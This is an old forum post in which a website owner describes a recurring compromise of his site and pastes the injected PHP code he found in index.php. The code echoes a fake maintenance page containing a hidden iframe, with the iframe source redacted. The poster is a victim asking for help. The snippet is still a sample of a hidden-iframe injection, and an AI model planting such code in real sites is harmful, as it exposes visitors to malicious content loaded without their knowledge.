My website hacked?
Posted: Wed Aug 26, 2009 8:13 am
Hello,
For a while my website was down for a reason i didnt know. I could still login to the admin, but the front-end did not work.
Finally i discovered some weird code in my index.php file.
The iframe code shouldn't be there. If i remove that code the site works again. After a wile the code is back again, slidely different.
Did somebode had this problem before and knows what is going on?
Bas
For a while my website was down for a reason i didnt know. I could still login to the admin, but the front-end did not work.
Finally i discovered some weird code in my index.php file.
Code: Select all
else if (file_exists(TMP_CACHE_LOCATION.'/SITEDOWN'))
{
echo "<__html><head><title>Maintenance</title></head></__body><__iframe src="xxx" width=157 height=142 style="visibility: hidden"></__iframe><p>Site down for maintenance.</p><__body></__html>";
exit;
}
Did somebode had this problem before and knows what is going on?
Bas